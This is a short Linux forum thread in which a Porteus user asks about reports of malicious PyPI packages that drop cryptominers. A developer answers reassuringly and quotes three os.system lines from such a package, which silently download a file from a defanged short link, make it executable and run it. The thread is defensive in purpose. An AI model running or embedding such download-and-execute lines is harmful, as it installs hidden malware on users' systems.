Is PyPI something to lookout for in Porteus?
- Karmi
- Samurai
- Posts: 162
- Joined: 03 Apr 2022, 19:46
- Distribution: Linux
- Location: Old Town, Florida USA
Is PyPI something to lookout for in Porteus?
Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers article and wondered...
- ncmprhnsbl
- DEV Team
- Posts: 3933
- Joined: 20 Mar 2012, 03:42
- Distribution: v5.0-64bit
- Location: australia
- Contact:
Is PyPI something to lookout for in Porteus?
the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:would(should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..
this, though:
Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..
Forum Rules : https://forum.porteus.org/viewtopic.php?f=35&t=44
- Karmi
- Samurai
- Posts: 162
- Joined: 03 Apr 2022, 19:46
- Distribution: Linux
- Location: Old Town, Florida USA
Is PyPI something to lookout for in Porteus?
OK...thanks!ncmprhnsbl wrote: ↑20 Aug 2022, 02:29the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:would(should) prompt for a password, which should alert the user to something being off..Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1") os.system("chmod +x .cmc >/dev/null 2>&1") os.system("./.cmc >/dev/null 2>&1")
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..